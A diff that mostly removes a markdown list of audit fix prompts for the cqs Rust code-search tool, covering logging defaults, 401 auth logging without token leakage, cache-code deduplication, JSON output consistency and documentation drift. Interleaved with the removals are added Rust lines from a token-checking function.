-## P1.20 — Default subscriber drops every info_span — 150 spans invisible at default level
-
-**Finding:** P1.20 in audit-triage.md / Observability OB-V1.30-1
-**Files:** `src/main.rs:14-32`
-**Why:** Default `EnvFilter` is `"warn,ort=error"`, but every span across `scout`, `gather`, `serve`, `cache`, `slot`, parser, store, embedder is `info_span!` or `debug_span!`. Subscriber drops them all. The heavy investment in span instrumentation is invisible until the user discovers `--verbose`/`RUST_LOG=info`. Daemon under `cqs watch --serve` inherits empty `RUST_LOG` and is doubly hit.
-
-### Current code (src/main.rs:14-32)
-
-```rust
-fn main() -> Result<()> {
-    // Parse CLI first to check verbose flag
-    let cli = cli::Cli::parse();
-
-    // Log to stderr to keep stdout clean for structured output
-    // --verbose flag sets debug level, otherwise use RUST_LOG or default to warn
-    let filter = if cli.verbose {
-        EnvFilter::new("debug")
+    if kept.is_empty() {
+        path.to_string()
     } else {
-        EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("warn,ort=error"))
-    };
-
-    tracing_subscriber::fmt()
-        .with_env_filter(filter)
-        .with_writer(std::io::stderr)
-        .init();
-
-    cli::run_with(cli)
+        format!("{path}?{}", kept.join("&"))
+    }
 }
-```
 
-### Replacement
-
-```rust
-fn main() -> Result<()> {
-    // Parse CLI first to check verbose flag
-    let cli = cli::Cli::parse();
-
-    // Log to stderr to keep stdout clean for structured output.
-    // --verbose flag sets debug level for cqs (everything else stays at info),
-    // otherwise honour RUST_LOG, defaulting to "cqs=info,warn" so the
-    // ~150 span instrumentation sites in the codebase actually render
-    // without third-party noise. (OB-V1.30-1.)
-    let filter = if cli.verbose {
-        EnvFilter::new("cqs=debug,info")
-    } else {
-        EnvFilter::try_from_default_env()
-            .unwrap_or_else(|_| EnvFilter::new("cqs=info,warn,ort=error"))
-    };
-
-    // FmtSpan::CLOSE emits a synthetic event on span close with elapsed time —
-    // turns every `info_span!("foo", ...).entered()` into a "foo" + latency
-    // line in the journal automatically. Without it, only events emitted
-    // *inside* a span produce log lines; entry/exit pairs disappear.
-    tracing_subscriber::fmt()
-        .with_env_filter(filter)
-        .with_span_events(tracing_subscriber::fmt::format::FmtSpan::CLOSE)
-        .with_writer(std::io::stderr)
-        .init();
-
-    cli::run_with(cli)
-}
-```
-
-### Notes
-
-- Verify the codebase's actual crate name in Cargo.toml — `cqs` is what `lib.rs` declares per `MEMORY.md`.
-- Side effect: every `cqs <command>` now prints span boundaries to stderr at default level. May surprise existing users who pipe stdout but watch stderr. Mention in CHANGELOG: "default log level raised to `cqs=info,warn` so span instrumentation renders by default; set `RUST_LOG=warn` to silence."
-- Companion finding P1.21 (auth failures log nothing) and P2.25 (per-request span disconnected from spawn_blocking) become valuable only after this lands.
-- Stretch (out of scope): `--log-format=json` flag wired to `.json()` builder for daemon journals. Tracking-issue.
-
----
-
-## P1.21 — Auth failures log nothing — no journal trail for 401s
-
-**Finding:** P1.21 in audit-triage.md / Observability OB-V1.30-2
-**Files:** `src/serve/auth.rs:194-232` (specifically the `AuthOutcome::Unauthorized` arm at lines 224-230)
-**Why:** Auth middleware returns 401 silently. Brute-force scans, expired bookmarks, misconfigured clients leave no journal trail. Asymmetric with `enforce_host_allowlist` (`src/serve/mod.rs:246`) which DOES emit `tracing::warn!` on rejection.
-
-### Current code (src/serve/auth.rs:224-230)
-
-```rust
-        AuthOutcome::Unauthorized => {
-            // Body intentionally minimal: no debug data, no token-
-            // length leak. Tracing happens once per launch (banner)
-            // and never per-request — auditors can grep for the
-            // count of 401s in access logs without seeing tokens.
-            (StatusCode::UNAUTHORIZED, "Unauthorized").into_response()
-        }
-```
-
-### Replacement
-
-```rust
-        AuthOutcome::Unauthorized => {
-            // Body intentionally minimal: no debug data, no token-
-            // length leak. Tracing emits method + path (NOT query
-            // string — that may carry `?token=` candidates) so
-            // operators get a journal trail for 401s without
-            // logging token material.
-            tracing::warn!(
-                method = %req.method(),
-                path = %req.uri().path(),
-                "serve: rejected unauthenticated request",
-            );
-            (StatusCode::UNAUTHORIZED, "Unauthorized").into_response()
-        }
-```
-
-### Notes
-
-- Critical: log `path` only, NOT `uri()` — the URI carries `?token=…` for the OkViaQueryParam case but the same shape can appear on Unauthorized (bad token still has the param). `req.uri().path()` strips the query string.
-- Companion to P1.11 (TraceLayer also leaks query string). Both must be fixed together; otherwise the OB-V1.30-1 default-level fix (P1.20) makes the leak more visible, not less.
-- Add a regression test `test_unauthorized_logs_method_and_path_no_query` in `src/serve/auth.rs::tests` that wraps the test subscriber and asserts `?token=...` is absent from captured events.
-
----
-# P2 Fix Prompts — Part A (P2.1 through P2.46)
-
-Source: `docs/audit-triage.md` (P2 table) and `docs/audit-findings.md`. Each prompt
-is self-contained; line numbers verified against the working tree on 2026-04-26.
-
-> **Already-fixed callout:** P2.43 (`semantic_diff` tie-break), P2.44 (`is_structural_query` words check), P2.45 (`bfs_expand` seed sort), P2.46 (`contrastive_neighbors` tie-break) all already carry tie-break / words-loop fixes in the working tree. The prompts below for those four are **regression-pin tests only** — the implementation fix is already on disk.
-
----
-
-## P2.1 — `cmd_similar` JSON parity drop
-
-**Finding:** P2.1 in audit-triage.md
-**Files:** `src/cli/batch/handlers/info.rs:139-148`
-**Why:** Batch path emits 3 fields; CLI emits the canonical 9-field SearchResult shape via `r.to_json()`. Agents see a different schema for `cqs similar` depending on whether the daemon is up.
-
-### Current code
-
-```rust
-let json_results: Vec<serde_json::Value> = filtered
-    .iter()
-    .map(|r| {
-        serde_json::json!({
-            "name": r.chunk.name,
-            "file": normalize_path(&r.chunk.file),
-            "score": r.score,
-        })
-    })
-    .collect();
-```
-
-### Replacement
-
-```rust
-let json_results: Vec<serde_json::Value> =
-    filtered.iter().map(|r| r.to_json()).collect();
-```
-
-### Notes
-
-- `to_json()` is on `cqs::store::SearchResult` at `src/store/helpers/types.rs:143-156` and already normalizes the file path via the canonical helper.
-- Add a snapshot test asserting CLI and batch produce identical key sets for the same query.
-
----
-
-## P2.2 — `dispatch_diff` dead `target_store` placeholder
-
-**Finding:** P2.2 in audit-triage.md
-**Files:** `src/cli/batch/handlers/misc.rs:354-387`
-**Why:** Dead-variable initialization plus duplicate `if target_label == "project"` match. The `get_ref` cached store at line 360 is loaded then discarded; the else branch reopens via `resolve_reference_store` at 378.
-
-### Current code
-
-```rust
-let target_label = target.unwrap_or("project");
-let target_store = if target_label == "project" {
-    &ctx.store()
-} else {
-    ctx.get_ref(target_label)?;
-    &ctx.store() // placeholder -- replaced below
-};
-
-// For non-project targets, resolve properly
-let result = if target_label == "project" {
-    cqs::semantic_diff(&source_store, target_store, source, target_label, threshold, lang)?
-} else {
-    let target_ref_store =
-        crate::cli::commands::resolve::resolve_reference_store(&ctx.root, target_label)?;
-    cqs::semantic_diff(&source_store, &target_ref_store, source, target_label, threshold, lang)?
-};
-```
-
-### Replacement
-
-```rust
-let target_label = target.unwrap_or("project");
-let result = if target_label == "project" {
-    cqs::semantic_diff(
-        &source_store,
-        &ctx.store(),
-        source,
-        target_label,
-        threshold,
-        lang,
-    )?
-} else {
-    let target_ref_store =
-        crate::cli::commands::resolve::resolve_reference_store(&ctx.root, target_label)?;
-    cqs::semantic_diff(
-        &source_store,
-        &target_ref_store,
-        source,
-        target_label,
-        threshold,
-        lang,
-    )?
-};
-```
-
-### Notes
-
-- Drop the `ctx.get_ref(target_label)?` line entirely — it cached a store the code never reads. `resolve_reference_store` owns the lifetime here.
-- One `if target_label == "project"` block, no placeholder, no duplicate match.
-
----
-
-## P2.3 — Embedding/Query cache `open_with_runtime` 90+ line copy-paste
-
-**Finding:** P2.3 in audit-triage.md
-**Files:** `src/cache.rs:103-220` (`EmbeddingCache::open_with_runtime`), `src/cache.rs:1412-1522` (`QueryCache::open_with_runtime`)
-**Why:** Two methods do parent-dir prep, runtime fallback, pool open, schema create, and 0o600 chmod loop in identical order with only `busy_timeout` differing. ~90 duplicated lines.
-
-### Current code (sketch — both methods share this skeleton)
-
-```rust
-pub fn open_with_runtime(path: &Path, runtime: Option<Arc<Runtime>>) -> Result<Self, CacheError> {
-    let _span = tracing::info_span!("EmbeddingCache::open", path = %path.display()).entered();
-    if let Some(parent) = path.parent() {
-        std::fs::create_dir_all(parent)?;
-        #[cfg(unix)] {
-            // 16 lines: chmod 0o700 best-effort with warn block
+/// Extract the token from one of three channels — header, cookie,
+/// or query string — and constant-time-compare against the launched
+/// token. Returns `None` if none matched (caller emits 401).
+///
+/// `query_param_used` is set to true when the match came from
+/// `?token=<…>`; the caller then sets a cookie and 302-redirects to
+/// the clean URL.
+fn check_request(req: &Request, expected: &AuthToken, cookie_name: &str) -> AuthOutcome {
+    // 1. Authorization: Bearer …
+    if let Some(bearer) = req
+        .headers()
+        .get(header::AUTHORIZATION)
+        .and_then(|v| v.to_str().ok())
+        .and_then(|v| v.strip_prefix("Bearer "))
+    {
+        if ct_eq(bearer, expected.as_str()) {
+            return AuthOutcome::Ok;
         }
     }
-    let rt = if let Some(rt) = runtime { rt } else {
-        // 9 lines: current_thread runtime fallback
-    };
-    let opts = SqliteConnectOptions::new().filename(path).create_if_missing(true)
-        .busy_timeout(Duration::from_millis(5000))  // QueryCache: 2000
-        .journal_mode(SqliteJournalMode::Wal);
-    let pool = rt.block_on(SqlitePoolOptions::new().max_connections(1)
-        .idle_timeout(Duration::from_secs(30)).connect_with(opts))?;
-    rt.block_on(sqlx::query(SCHEMA_SQL).execute(&pool))?;
-    #[cfg(unix)] {
-        // 22 lines: 0o600 chmod loop on ["", "-wal", "-shm"]
-    }
-    // ... build Self
-}
-```
 
-### Replacement
-
-Extract three private helpers into a sibling module (e.g. `src/cache/open.rs` or inline at top of `cache.rs`):
-
-```rust
-#[cfg(unix)]
-pub(super) fn prepare_cache_dir_perms(parent: &Path) {
-    use std::os::unix::fs::PermissionsExt;
-    if let Ok(meta) = std::fs::metadata(parent) {
-        let mut perms = meta.permissions();
-        if perms.mode() & 0o777 != 0o700 {
-            perms.set_mode(0o700);
-            if let Err(e) = std::fs::set_permissions(parent, perms) {
-                tracing::warn!(parent = %parent.display(), error = %e, "best-effort chmod 0o700 on cache dir failed");
-            }
-        }
-    }
-}
-
-#[cfg(unix)]
-pub(super) fn apply_db_file_perms(path: &Path) {
-    use std::os::unix::fs::PermissionsExt;
-    for suffix in ["", "-wal", "-shm"] {
-        let p = path.with_extension(format!("{}{}", path.extension().and_then(|s| s.to_str()).unwrap_or(""), suffix));
-        if let Ok(meta) = std::fs::metadata(&p) {
-            let mut perms = meta.permissions();
-            if perms.mode() & 0o777 != 0o600 {
-                perms.set_mode(0o600);
-                let _ = std::fs::set_permissions(&p, perms);
-            }
-        }
-    }
-}
-
-pub(super) fn connect_cache_pool(
-    path: &Path,
-    busy_ms: u64,
-    runtime: Option<Arc<Runtime>>,
-    schema_sql: &str,
-) -> Result<(SqlitePool, Arc<Runtime>), CacheError> {
-    let rt = runtime.unwrap_or_else(|| {
-        Arc::new(Builder::new_current_thread().enable_all().build()
-            .expect("cache: failed to build current_thread runtime"))
-    });
-    let opts = SqliteConnectOptions::new().filename(path).create_if_missing(true)
-        .busy_timeout(Duration::from_millis(busy_ms))
-        .journal_mode(SqliteJournalMode::Wal);
-    let pool = rt.block_on(async {
-        let p = SqlitePoolOptions::new().max_connections(1)
-            .idle_timeout(Duration::from_secs(30)).connect_with(opts).await?;
-        sqlx::query(schema_sql).execute(&p).await?;
-        Ok::<_, sqlx::Error>(p)
-    })?;
-    Ok((pool, rt))
-}
-```
-
-Both `open_with_runtime` methods collapse to ~30 lines each, calling these three helpers.
-
-### Notes
-
-- Keep `Drop` impl panic-extraction unified via P2.4's helper too.
-- Watch for the WAL/SHM filename quirk: SQLite tags them as `<basename>-wal`, not via `with_extension`. The existing code uses string concat (`path.to_string_lossy() + "-wal"`); preserve that semantic in `apply_db_file_perms`.
-
----
-
-## P2.4 — `env::var(...).parse()` pattern at 25+ sites
-
-**Finding:** P2.4 in audit-triage.md
-**Files:** `src/limits.rs:230-260` (private helpers); duplicated at `src/cli/watch.rs:65,74,100,498,510,766,942,1430`, `src/llm/mod.rs:176,315,406,434`, `src/cli/pipeline/types.rs:80,98,117,144`, `src/hnsw/persist.rs:19,41,63`, `src/embedder/models.rs:565,571`, `src/embedder/mod.rs:330`, `src/cache.rs:206,1509`, `src/gather.rs:156`, `src/cli/commands/graph/trace.rs:357`, `src/impact/bfs.rs:16`, `src/reranker.rs:129`
-**Why:** `parse_env_f32 / parse_env_usize / parse_env_u64` exist in `limits.rs` but are `pub(crate)`-private to `cqs::limits`. Every other module re-rolls the pattern with slightly different zero-handling and warn behavior. P2.5 (cache zero-divergence) is a direct consequence.
-
-### Replacement plan
-
-1. Promote the three helpers in `src/limits.rs` to `pub`, and add a `parse_env_duration_secs` variant. Keep the existing `pub(crate)` re-exports so internal callers don't break.
-2. Replace the 25+ open-coded sites with calls. Example for `src/cli/pipeline/types.rs:143`:
-
-```rust
-// Before
-match std::env::var("CQS_EMBED_BATCH_SIZE") {
-    Ok(val) => match val.parse::<usize>() { Ok(s) if s > 0 => s, _ => 64 },
-    Err(_) => 64,
-}
-// After
-cqs::limits::parse_env_usize("CQS_EMBED_BATCH_SIZE", 64).max(1)
-```
-
-### Notes
-
-- Decide zero-handling **once** in the helper signature (e.g. `parse_env_usize_nonzero`); P2.5 is a known divergence to fold into the same PR.
-- Don't change observable behavior in this PR — match the existing default at every call site even where the new helper would be cleaner. Behavior changes ride on a follow-up.
-
----
-
-## P2.5 — `EmbeddingCache` accepts `CQS_CACHE_MAX_SIZE=0`; `QueryCache` rejects
-
-**Finding:** P2.5 in audit-triage.md
-**Files:** `src/cache.rs:206-209` (Embedding, no zero filter), `src/cache.rs:1509-1513` (Query, `.filter(|&n: &u64| n > 0)`)
-
-### Current code
-
-```rust
-// EmbeddingCache (line 206-209)
-let max_size_bytes = std::env::var("CQS_CACHE_MAX_SIZE")
-    .ok()
-    .and_then(|s| s.parse().ok())
-    .unwrap_or(10 * 1024 * 1024 * 1024); // 10GB default
-
-// QueryCache (line 1509-1513)
-let max_size_bytes = std::env::var("CQS_QUERY_CACHE_MAX_SIZE")
-    .ok()
-    .and_then(|s| s.parse().ok())
-    .filter(|&n: &u64| n > 0)
-    .unwrap_or(100 * 1024 * 1024);
-```
-
-### Replacement
-
-Pick semantic: "0 is invalid → fall back to default". Add the filter to `EmbeddingCache`:
-
-```rust
-let max_size_bytes = std::env::var("CQS_CACHE_MAX_SIZE")
-    .ok()
-    .and_then(|s| s.parse().ok())
-    .filter(|&n: &u64| n > 0)
-    .unwrap_or(10 * 1024 * 1024 * 1024);
-```
-
-### Notes
-
-- Folds naturally into the P2.4 helper sweep — drive both through `parse_env_u64_nonzero` once that helper lands.
-- Document chosen semantic at the env-var site.
-
----
-
-## P2.6 / P2.7 / P2.9 / P2.10 — README documentation drift (combined)
-
-**Finding:** P2.6, P2.7, P2.9, P2.10 in audit-triage.md
-**Files:** `README.md:5,467-525,521,530-585,649-653`
-**Why:** TL;DR claims "544-query eval" (actual 218); claims 54 languages but Elm missing from list; Claude Code Integration block omits 5 commands and lists `stats/prune/compact` instead of `stats/clear/prune/compact`.
-
-### Current code (README.md:5)
-
-```markdown
-**TL;DR:** Code intelligence toolkit for Claude Code. ... 17-41x token reduction vs full file reads. **42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 544-query dual-judge eval against the cqs codebase itself** (BGE-large dense + SPLADE sparse with per-category fusion + centroid query routing). 54 languages + L5X/L5K PLC exports, GPU-accelerated.
-```
-
-### Replacement (TL;DR — P2.6, P2.7)
-
-```markdown
-**TL;DR:** Code intelligence toolkit for Claude Code. ... 17-41x token reduction vs full file reads. **42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 218-query dual-judge eval (109 test + 109 dev, v3.v2 fixture) against the cqs codebase itself** (BGE-large dense + SPLADE sparse with per-category fusion + centroid query routing). 54 languages + L5X/L5K PLC exports, GPU-accelerated.
-```
-
-Plus add an `Elm` bullet to the alphabetical list under `## Supported Languages (54)` between `Dockerfile` and `Erlang` (or wherever alphabetically).
-
-### Replacement (Claude Code Integration — P2.9, P2.10)
-
-In `README.md:521`:
-
-```markdown
-- `cqs cache stats/clear/prune/compact` - manage the project-scoped embeddings cache at `<project>/.cqs/embeddings_cache.db`. `--per-model` on stats; `clear --model <fp>` deletes all cached embeddings for one fingerprint; `prune <DAYS>` or `prune --model <id>`; `compact` runs VACUUM
-```
-
-Add five new bullets in the alphabetically-correct positions inside the Code Intelligence block (lines 467-525):
-
-```markdown
-- `cqs ping` - daemon healthcheck; reports daemon socket path and uptime if running
-- `cqs eval <fixture>` - run a query fixture against the current index and emit R@K metrics. `--baseline <path>` to compare two reports
-- `cqs model show/list/swap` - inspect the embedding model recorded in the index, list presets, or swap with restore-on-failure semantics
-- `cqs serve [--bind ADDR]` - launch the read-only web UI (graph, hierarchy, cluster, chunk-detail). Per-launch auth token; banner prints the URL
-- `cqs refresh` - invalidate daemon caches and re-open the Store. Alias `cqs invalidate`. No-op when no daemon is running
-```
-
-### Notes
-
-- Eval metrics: optionally also bump to refreshed v3.v2 numbers (`63.3% R@5 test, 74.3% R@5 dev`) per memory file `feedback_eval_line_start_drift.md`. Keep both numbers consistent if updating.
-- Verify language count by walking `define_languages!` macro in `src/language/mod.rs` — fix the README header to match instead of guessing.
-
----
-
-## P2.8 — SECURITY.md omits per-project embeddings_cache.db
-
-**Finding:** P2.8 in audit-triage.md
-**Files:** `SECURITY.md:65-82` (Read Access table)
-
-### Current code
-
-```markdown
-| `~/.cache/cqs/embeddings.db` | Global embedding cache (content-addressed, capped at 1 GB) | Index and search |
-| `~/.cache/cqs/query_cache.db` | Recent query embedding cache (7-day TTL) | Search |
-```
-
-### Replacement
-
-Add row to both Read Access (line 65-82) and Write Access (line 83-95) tables:
-
-```markdown
-| `<project>/.cqs/embeddings_cache.db` | Per-project embedding cache (PR #1105, primary; legacy global cache at `~/.cache/cqs/embeddings.db` is fallback) | `cqs index`, search |
-```
-
-Also fix the misleading "7-day TTL" claim — see P1.2 (PRIVACY.md fix); keep SECURITY consistent: `Recent query embedding cache (size-capped at CQS_QUERY_CACHE_MAX_SIZE, 100 MiB default)`.
-
-### Notes
-
-- Cross-check against PRIVACY.md so wording matches; the same per-project path is documented correctly there at lines 16-20.
-
----
-
-## P2.11 — `cqs --json model swap/show` emits plain-text errors
-
-**Finding:** P2.11 in audit-triage.md
-**Files:** `src/cli/commands/infra/model.rs:144-149` (`cmd_model_show` bail), `src/cli/commands/infra/model.rs:256-261` (`cmd_model_swap` Unknown preset), `src/cli/commands/infra/model.rs:267-272` (`cmd_model_swap` no-index bail)
-
-### Current code
-
-```rust
-// cmd_model_show, line 144-149
-if !index_path.exists() {
-    bail!(
-        "No index at {}. Run `cqs init && cqs index` first.",
-        index_path.display()
-    );
-}
-
-// cmd_model_swap, line 256-272
-let new_cfg = ModelConfig::from_preset(preset).ok_or_else(|| {
-    let valid = ModelConfig::PRESET_NAMES.join(", ");
-    anyhow::anyhow!(
-        "Unknown preset '{preset}'. Valid presets: {valid}. Run `cqs model list` for repos."
-    )
-})?;
-
-if !index_path.exists() {
-    bail!(
-        "No index at {}. Run `cqs init && cqs index --model {preset}` first.",
-        index_path.display()
-    );
-}
-```
-
-### Replacement
-
-Route through `crate::cli::json_envelope::emit_json_error` when `json` is true:
-
-```rust
-// cmd_model_show
-if !index_path.exists() {
-    let msg = format!("No index at {}. Run `cqs init && cqs index` first.", index_path.display());
-    if json {
-        crate::cli::json_envelope::emit_json_error("no_index", &msg)?;
-        std::process::exit(1);
-    }
-    bail!("{msg}");
-}
-
-// cmd_model_swap — Unknown preset
-let new_cfg = match ModelConfig::from_preset(preset) {
-    Some(c) => c,
-    None => {
-        let valid = ModelConfig::PRESET_NAMES.join(", ");
-        let msg = format!("Unknown preset '{preset}'. Valid presets: {valid}. Run `cqs model list` for repos.");
-        if json {
-            crate::cli::json_envelope::emit_json_error("unknown_preset", &msg)?;
-            std::process::exit(1);
-        }
-        bail!("{msg}");
-    }
-};
-
-// cmd_model_swap — no index (mirror cmd_model_show fix)
-```
-
-Also add `already_on_target` code for the no-op short-circuit and `swap_failed` for the post-rebuild restore path.
-
-### Notes
-
-- Pattern matches `cmd_ref_remove` in `src/cli/commands/infra/reference.rs` which the v1.30.0 audit already standardized.
-- Tests: snapshot a `cqs --json model swap nonexistent` against the canonical envelope shape `{data: null, error: {code, message}, version: 1}`.
-
----
-
-## P2.12 — `cqs init / index / convert` lack `--json`
-
-**Finding:** P2.12 in audit-triage.md
-**Files:** `src/cli/commands/infra/init.rs:13` (`cmd_init`), `src/cli/commands/index/build.rs::cmd_index`, `src/cli/commands/index/convert.rs::cmd_convert`, `src/cli/args.rs::IndexArgs`, `src/cli/args.rs` (no `InitArgs` / `ConvertArgs` struct yet)
-
-### Replacement
-
-1. Add `pub json: bool` to `IndexArgs`, introduce `InitArgs { #[arg(long)] pub json: bool }`, add `pub json: bool` to `ConvertArgs`.
-2. Thread `cli.json || args.json` into `cmd_init` / `cmd_index` / `cmd_convert`.
-3. After work completes, emit a final summary envelope:
-
-```rust
-// cmd_init
-if json {
-    let obj = serde_json::json!({
-        "initialized": true,
-        "cqs_dir": cqs_dir.display().to_string(),
-        "model": effective_model_name,
-    });
-    crate::cli::json_envelope::emit_json(&obj)?;
-}
-
-// cmd_index
-if json {
-    let obj = serde_json::json!({
-        "indexed_files": file_count,
-        "indexed_chunks": chunk_count,
-        "took_ms": elapsed.as_millis(),
-        "model": model_name,
-        "summaries_added": summaries_added,
-        "docs_improved": docs_improved,
-    });
-    crate::cli::json_envelope::emit_json(&obj)?;
-}
-
-// cmd_convert
-if json {
-    let obj = serde_json::json!({
-        "converted": converted_paths,
-        "skipped": skipped_paths,
-        "took_ms": elapsed.as_millis(),
-    });
-    crate::cli::json_envelope::emit_json(&obj)?;
-}
-```
-
-4. Suppress per-step progress prints when `json` is true (route to stderr or gate on `!json`).
-
-### Notes
-
-- `cmd_doctor` already has a `Colored human-readable check progress is routed to stderr in this mode` pattern — reuse it.
-- These three commands already emit useful progress; do not regress that for the text path.
-
----
-
-## P2.13 — Global `--slot` silently ignored by `slot` and `cache` subcommands
-
-**Finding:** P2.13 in audit-triage.md
-**Files:** `src/cli/definitions.rs` (`pub slot: Option<String>` is `global = true`); consumers: `src/cli/commands/infra/slot.rs` (`SlotCommand::*`), `src/cli/commands/infra/cache_cmd.rs::resolve_cache_path`
-
-### Replacement
-
-Two acceptable shapes — pick at PR time:
-
-**Option A (recommended):** Move `--slot` off `global = true` and onto only the subcommands that consume it. Apply via `#[command(flatten)]` of a `SlotArg { #[arg(long)] pub slot: Option<String> }` to: `Search`, `Index`, `Doctor`, `ModelSwap`, etc. Drop from `Slot*`/`Cache*`.
-
-**Option B:** Keep global but enforce at dispatch:
-
-```rust
-// In dispatch routing for Slot* / Cache* arms:
-if cli.slot.is_some() {
-    bail!("--slot has no effect on `cqs {subcommand}` (this command is project-scoped, not slot-scoped)");
-}
-```
-
-### Notes
-
-- Cache is project-scoped per #1105, not per-slot — that contract is the source of the bug. Don't accidentally make it slot-scoped without an explicit design decision.
-- Bonus cleanup: `cqs slot create foo --slot bar` is parsed as "create slot foo" today; option A makes the misuse a clap error.
-
----
-
-## P2.14 — `cqs refresh` has no `--json`
-
-**Finding:** P2.14 in audit-triage.md
-**Files:** `src/cli/definitions.rs:759-760` (`Commands::Refresh` — variant has no fields); `src/cli/registry.rs` Refresh dispatch arm; daemon-side `dispatch_refresh` handler
-
-### Current code
-
-```rust
-#[command(visible_alias = "invalidate")]
-Refresh,
-```
-
-### Replacement
-
-```rust
-#[command(visible_alias = "invalidate")]
-Refresh {
-    #[arg(long)]
-    json: bool,
-},
-```
-
-In the dispatch arm, when `json` is set emit:
-
-```rust
-let obj = serde_json::json!({
-    "refreshed": true,
-    "daemon_running": daemon_was_running,
-    "caches_invalidated": ["embedder_session", "query_cache_lru", "notes"],
-});
-crate::cli::json_envelope::emit_json(&obj)?;
-```
-
-### Notes
-
-- `cli.json || args.json` precedence so the global flag still works.
-- Update the registry `for_each_command!` row if pattern-matching on field shape.
-
----
-
-## P2.15 — List-shape JSON envelopes inconsistent across `*list` commands
-
-**Finding:** P2.15 in audit-triage.md
-**Files:** `src/cli/commands/infra/reference.rs::cmd_ref_list` (raw array), `src/cli/commands/infra/model.rs::cmd_model_list` (raw array), `src/cli/commands/infra/project.rs:124-140` (object), `src/cli/commands/infra/slot.rs::slot_list` (object), `src/cli/commands/io/notes.rs::cmd_notes_list` (object), `src/cli/commands/search/query.rs` (object)
-
-### Replacement
-
-Standardize on `{"data": {"<plural>": [...], <optional summary fields>}}`:
-
-```rust
-// cmd_ref_list — change from raw Vec<RefSummary> to:
-let obj = serde_json::json!({ "references": refs });
-crate::cli::json_envelope::emit_json(&obj)?;
-
-// cmd_model_list — change from raw Vec<ModelInfo> to:
-let obj = serde_json::json!({
-    "models": models,
-    "current": current_name, // fold the per-row `current: bool` into a top-level field
-});
-crate::cli::json_envelope::emit_json(&obj)?;
-```
-
-### Notes
-
-- One PR touches both call sites + their tests. No external users — hard rename is fine per project memory.
-- After the rename, `data.{slots,projects,refs,models,notes}` is a uniform accessor.
-
----
-
-## P2.16 — `cache stats` mixes bytes and MB; `cache compact` uses bytes only
-
-**Finding:** P2.16 in audit-triage.md
-**Files:** `src/cli/commands/infra/cache_cmd.rs::cache_stats` (around line 145-149, emits both `total_size_bytes` AND `total_size_mb`), `cache_compact` (bytes only)
-
-### Current code (cache_stats JSON branch)
-
-```rust
-let obj = serde_json::json!({
-    "cache_path": cache_path.display().to_string(),
-    "total_entries": stats.total_entries,
-    "total_size_bytes": stats.total_size_bytes,
-    "total_size_mb": stats.total_size_bytes as f64 / 1_048_576.0,
-    // ...
-});
-```
-
-### Replacement
-
-```rust
-let obj = serde_json::json!({
-    "cache_path": cache_path.display().to_string(),
-    "total_entries": stats.total_entries,
-    "total_size_bytes": stats.total_size_bytes,
-    // total_size_mb dropped — bytes is the canonical unit
-    // ...
-});
-```
-
-Keep the `total_size_mb` rendering only on the human text path (`format!("{:.1} MB", ...)`).
-
-### Notes
-
-- Repository-wide grep for consumers of `total_size_mb` before dropping. None expected (no external users).
-
----
-
-## P2.17 — `dispatch::try_daemon_query` warns then silently re-runs in CLI
-
-**Finding:** P2.17 in audit-triage.md
-**Files:** `src/cli/dispatch.rs:445-462`
-**Why:** EH-13 comment claims "no silent fallback" but the function returns `None` to fall through to CLI anyway. Daemon-only features can produce different results between the warning print and the CLI re-run.
-
-### Current code
-
-```rust
-// EH-13: daemon understood the request but surfaced an error. ... Falling
-// back to CLI now would mask daemon bugs ...
-let msg = resp.get("message").and_then(|v| v.as_str()).unwrap_or("daemon error");
-tracing::warn!(error = msg, "Daemon returned protocol-level error");
-eprintln!("cqs: daemon error: {msg}");
-eprintln!("hint: set CQS_NO_DAEMON=1 to run the command directly in the CLI (bypasses the daemon).");
-// Still return None so we fall through to CLI path, but the user has been
-// told why — no silent fallback.
-None
-```
-
-### Replacement
-
-Change the return type so the protocol-error case bubbles up instead of falling through:
-
-```rust
-// File header: change signature
-fn try_daemon_query(...) -> Result<Option<String>, anyhow::Error> { ... }
-
-// At the EH-13 branch:
-let msg = resp.get("message").and_then(|v| v.as_str()).unwrap_or("daemon error");
-tracing::warn!(error = msg, "Daemon returned protocol-level error");
-return Err(anyhow::anyhow!(
-    "daemon error: {msg}\nhint: set CQS_NO_DAEMON=1 to bypass the daemon"
-));
-```
-
-Caller at `:200` switches from `match try_daemon_query(...) { Some(s) => ..., None => fall_through_to_cli() }` to handling the new `Result<Option<String>>`:
-
-```rust
-match try_daemon_query(...)? {
-    Some(text) => emit(text),
-    None => fall_through_to_cli(),
-}
-```
-
-### Notes
-
-- Exits non-zero with the daemon's message — matches the comment's stated intent.
-- All existing transport-error paths (connect/read/write fail) still return `Ok(None)` so CLI fallback works for those.
-
----
-
-## P2.18 — `LocalProvider::fetch_batch_results` returns empty map on missing batch_id
-
-**Finding:** P2.18 in audit-triage.md
-**Files:** `src/llm/local.rs:542-547`
-
-### Current code
-
-```rust
-fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
-    // Drain the stash entry — returning empty if the id was already
-    // fetched or never existed.
-    let mut stash = self.stash.lock().unwrap();
-    Ok(stash.remove(batch_id).unwrap_or_default())
-}
-```
-
-### Replacement
-
-```rust
-fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
-    let mut stash = self.stash.lock().unwrap_or_else(|p| p.into_inner());
-    match stash.remove(batch_id) {
-        Some(m) => Ok(m),
-        None => Err(LlmError::BatchNotFound(format!(
-            "local batch_id {batch_id} not found in stash — already fetched, or submission silently lost results"
-        ))),
-    }
-}
-```
-
-Add the variant at the top of `src/llm/error.rs` (or wherever `LlmError` is defined):
-
-```rust
-#[error("batch not found: {0}")]
-BatchNotFound(String),
-```
-
-### Notes
-
-- Mutex poison fix piggybacks here (recover via `into_inner` instead of `unwrap`) — same lesson as P1.9.
-- Callers in `summary.rs` / `doc_comments.rs` should distinguish `BatchNotFound` (data drift, hard error) from `Http`/`Internal` (transient).
-
----
-
-## P2.19 — `serde_json::to_value(...).unwrap_or_else(json!({}))` at 6 sites
-
-**Finding:** P2.19 in audit-triage.md
-**Files:** `src/impact/format.rs:11-16, 101-106`, `src/cli/commands/io/context.rs:94-97, 320-323, 498-501`, `src/cli/commands/io/blame.rs:240-243`
-
-### Current code (representative — `src/impact/format.rs:11-16`)
-
-```rust
-pub fn impact_to_json(result: &ImpactResult) -> serde_json::Value {
-    serde_json::to_value(result).unwrap_or_else(|e| {
-        tracing::warn!(error = %e, "Failed to serialize ImpactResult");
